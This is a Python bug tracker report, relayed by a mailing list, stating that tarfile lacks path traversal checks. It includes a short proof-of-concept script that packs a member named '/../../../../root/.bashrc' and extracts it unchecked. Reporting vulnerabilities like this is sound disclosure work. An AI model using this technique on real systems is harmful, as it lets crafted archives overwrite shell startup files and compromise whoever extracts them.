New submission from daji ma <xiongpa...@gmail.com>:
tarfile missing cross-directory checking, like ../ or ..\, this potentially cause cross-directory decompression. the exp: # -*- coding: utf-8 -*- import tarfile def extract_tar(file_path, dest_path): try: with tarfile.open(file_path, 'r') as src_file: for info in src_file.getmembers(): src_file.extract(info.name, dest_path) return True except (IOError, OSError, tarfile.TarError): return False def make_tar(): tar_file=tarfile.open('x.tar.gz','w:gz') tar_file.add('bashrc', '/../../../../root/.bashrc') tar_file.list(verbose=True) tar_file.close() if __name__ == '__main__': make_tar() extract_tar('x.tar.gz', 'xx') ---------- components: Library (Lib) messages: 401631 nosy: xiongpanju priority: normal severity: normal status: open title: tarfile missing cross-directory checking type: security versions: Python 3.8 _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue45170> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com